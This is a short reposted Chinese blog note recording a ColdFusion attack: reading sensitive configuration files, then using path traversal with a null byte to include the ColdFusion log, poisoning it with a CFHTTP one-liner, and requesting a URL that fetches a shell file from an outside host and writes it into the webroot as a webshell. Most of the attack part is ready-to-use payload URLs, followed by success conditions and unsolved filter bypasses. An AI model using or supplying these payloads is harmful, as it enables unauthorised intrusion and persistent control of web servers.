博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
利用本地漏洞的攻击
阅读量:6160 次
发布时间:2019-06-21

本文共 706 字,大约阅读时间需要 2 分钟。

1.读取metabase.xml/web.xml /password.properities敏感文件,得知www路径,coldfusion路径,coldfusion后台加密密码

2.本地包含coldfusion日志,写cfm一句话,得到WEBSHELL

http://www.ypt.com/index.cfm?action=../../../../../../../../../../CFusionMX7/logs/application.log%00

http://www.ypt.com/index.cfm?action=<CFHTTP METHOD=Get URL=#URL.u# PATH=#URL.p# FILE=#URL.f#>

http://www.ypt.com/index.cfm?action=..\..\..\CFusionMX7\logs\application.log%00&u=http://www.pentest.cc/shell.txt&p=c:\inetpub\wwwroot\&f=shell.cfm

成功条件:

1.WEB目录可写

2.coldfusion目录和web目录在同一个分区

3.多个牛人的群策群力

未解决的问题:

1.iis的日志会把空格变成+,不知道怎么绕过

2.coldfusion会把单引号和双引号加倍处理,不知道怎么绕过去(师傅也遇到这个问题了,哈哈)

主要还是月月搞的,我只是做个记录,怕忘了.

本文转sinojelly51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/370813,如需转载请自行联系原作者

你可能感兴趣的文章
【转载】(EM算法)The EM Algorithm
查看>>
js调用.net后台事件,和后台调用前台等方法总结
查看>>
3D数学基础:图形与游戏开发
查看>>
用WPF+MongoDB开发房产信息收集器(4)——房产信息采集器总体介绍附程序下载
查看>>
oracle 取当天日期减一天 应该如何写
查看>>
【IBM Tivoli Identity Manager 学习文档】2 部署准备知识
查看>>
Jquery表单验证 只能输入数字,
查看>>
WCF 实例 —— Android 短信助手 (WCF + Android)
查看>>
学C/C++的同学们,有福了!
查看>>
ASP.NET上传下载文件
查看>>
POJ_2117 Elcctricity (tarjan 求割点)
查看>>
php 按引用传递的使用
查看>>
Coolite一个简单例子-GridPanel列表增删改预览
查看>>
SysLogHandler not writing to syslog with Python logging
查看>>
读懂AIMS 2013中的性能分析报告
查看>>
mpfr-3.1.0编译方法
查看>>
ADO.NET 基础(事务、通用的数据工厂)
查看>>
C#深入总结
查看>>
30个绝对让你惊叹的幽默创意广告设计
查看>>
Unix 下获得 root权限
查看>>